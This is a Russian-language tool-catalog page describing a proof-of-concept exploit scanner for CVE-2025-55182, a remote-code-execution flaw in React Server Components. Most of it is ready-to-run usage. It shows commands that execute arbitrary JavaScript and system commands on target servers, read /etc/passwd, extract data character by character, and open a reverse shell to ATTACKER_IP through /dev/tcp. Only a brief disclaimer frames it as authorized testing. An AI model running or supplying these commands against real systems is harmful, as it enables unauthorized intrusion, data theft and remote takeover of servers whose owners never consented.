Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
React2Shell-CVE-2025-55182 — POC React2Shell-CVE-2025-55182 | Kitploit
Инструменты/GitHubGitHub/shadowroot97/react2shell-cve-2025-55182
Сканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubshadowroot97/react2shell-cve-2025-55182

React2Shell-CVE-2025-55182

POC React2Shell-CVE-2025-55182

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
8 месяцев назадЕщё не проверено

CVE-2025-55182 - React2Shell

root@kitploit:~
    ____  _____    _    ____ _____ ____  ____  _   _ _____ _     _
   |  _ \| ____|  / \  / ___|_   _|___ \/ ___|| | | | ____| |   | |
   | |_) |  _|   / _ \| |     | |   __) \___ \| |_| |  _| | |   | |
   |  _ <| |___ / ___ \ |___  | |  / __/ ___) |  _  | |___| |___| |___
   |_| \_\_____/_/   \_\____| |_| |_____|____/|_| |_|_____|_____|_____|
                                                    [ CVE-2025-55182 ]

Сканер удалённого выполнения кода для React Server Components (RSC)

CVE Python


Авторы

РольИмяСсылка
Первичное исследованиеLachlan Davidsongithub.com/lachlan2k

На основе оригинального PoC: React2Shell-CVE-2025-55182-original-poc


Обзор

React2Shell — это полнофункциональный сканер безопасности для CVE-2025-55182, критической уязвимости удалённого выполнения кода (RCE), затрагивающей реализации React Server Components (RSC). Эта уязвимость позволяет неаутентифицированным злоумышленникам выполнять произвольный JavaScript-код на сервере через небезопасную десериализацию в протоколе React Flight.

Ключевые возможности

  • Тестирование нескольких вариантов: проверяет 4 различные структуры полезной нагрузки из первичного исследования
  • Определение версий: выявление уязвимых версий React и фреймворков
  • Проверка RCE: подтверждение выполнения кода через изменение дайджеста, временные задержки и внеполосные (OOB) обратные вызовы
  • Внеполосное тестирование: поддержка Burp Collaborator и Interactsh
  • Пользовательские полезные нагрузки: выполнение произвольного JavaScript на уязвимых серверах
  • Извлечение данных: посимвольная эксфильтрация данных
  • Профессиональный вывод: чистый цветной вывод в терминал со сбором доказательств

Установка

root@kitploit:~
# Клонируем репозиторий
git clone https://github.com/Shadowroot97/POC-React2Shell-CVE-2025-55182.git
cd POC-React2Shell-CVE-2025-55182

# Устанавливаем зависимости
pip install requests

# Запускаем сканер
python3 exploit_cve_2025_55182_v2.py -h

Использование

root@kitploit:~
usage: exploit_cve_2025_55182_v2.py [-h] [-t TARGET] [-f FILE] [-m {version,verify,custom}]
                                    [--js JS] [--extract] [--sleep SECONDS]
                                    [--callback URL] [--dns DOMAIN] [-v]
                                    [--no-color] [--timeout TIMEOUT]

Режимы сканирования

1. Режим определения версии (по умолчанию)

Пассивно определяет уязвимые версии React и фреймворков:

root@kitploit:~
python3 exploit_cve_2025_55182_v2.py -t https://target.com

2. Режим проверки (-m verify)

Активно подтверждает RCE с помощью нескольких методов и всех 4 вариантов полезной нагрузки:

root@kitploit:~
# Базовая проверка (изменение дайджеста)
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify

# Проверка на основе времени
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify --sleep 5

# Внеполосный обратный вызов (Burp Collaborator)
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify --callback abc123.oastify.com

# Полная проверка с подробным выводом
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify \
    --sleep 5 --callback abc123.oastify.com --dns abc123.oastify.com -v

3. Пользовательский режим (-m custom)

Выполнение произвольных JavaScript-полезных нагрузок:

root@kitploit:~
# Получить версию Node.js
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "process.version" --extract

# Выполнить системную команду
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "require('child_process').execSync('id').toString()" --extract

# Прочитать файл
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "require('fs').readFileSync('/etc/passwd','utf8')" --extract

4. Пакетное сканирование (-f)

Сканирование нескольких URL из файла с показом только уязвимых целей:

root@kitploit:~
python3 exploit_cve_2025_55182_v2.py -f targets.txt

Примеры

Базовое сканирование

root@kitploit:~
# Определение версии (режим по умолчанию)
python3 exploit_cve_2025_55182_v2.py -t https://target.com

# Проверка RCE
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify

# Пакетное сканирование нескольких целей
python3 exploit_cve_2025_55182_v2.py -f targets.txt

# Подробный вывод
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify -v

Расширенное использование

root@kitploit:~
# Проверка на основе времени + внеполосная проверка
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify \
    --sleep 5 --callback your-id.oastify.com

# Извлечение информации о сервере
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "process.version" --extract

# Выполнение команды
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "require('child_process').execSync('whoami').toString()" --extract

Обратная оболочка (reverse shell)

root@kitploit:~
# Запуск слушателя
nc -lvnp 443

# Выполнение обратной оболочки
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "process.mainModule.require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1\"')"

Отказ от ответственности

Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей.

  • Используйте только против систем, которыми вы владеете или на тестирование которых имеете явное разрешение
  • Несанкционированный доступ к компьютерным системам противозаконен
  • Авторы не несут ответственности за неправомерное использование этого инструмента
  • Всегда следуйте практике ответственного раскрытия уязвимостей

Ссылки

  • CVE-2025-55182 - NVD
  • Оригинальный PoC от Lachlan Davidson
  • Рекомендации по безопасности React
  • Рекомендации по безопасности Next.js
  • Документация React Server Components
Скачать инструмент
АргументОписание
-t, --targetURL цели (например, https://example.com)
-f, --fileФайл со списком URL (по одному в строке) для пакетного сканирования
-m, --modeРежим сканирования: version (по умолчанию), verify или custom
--jsJavaScript-код для пользовательского режима
--extractИзвлечение строкового результата посимвольно
--sleep SECONDSПроверка RCE на основе времени (режим verify)
--callback URLHTTP-адрес обратного вызова для внеполосного тестирования (режим verify)
--dns DOMAINDNS-домен обратного вызова для внеполосного тестирования (режим verify)
-v, --verboseПодробный вывод с деталями полезной нагрузки
--no-colorОтключить цветной вывод
--timeout SECONDSТаймаут HTTP-запроса (по умолчанию: 30)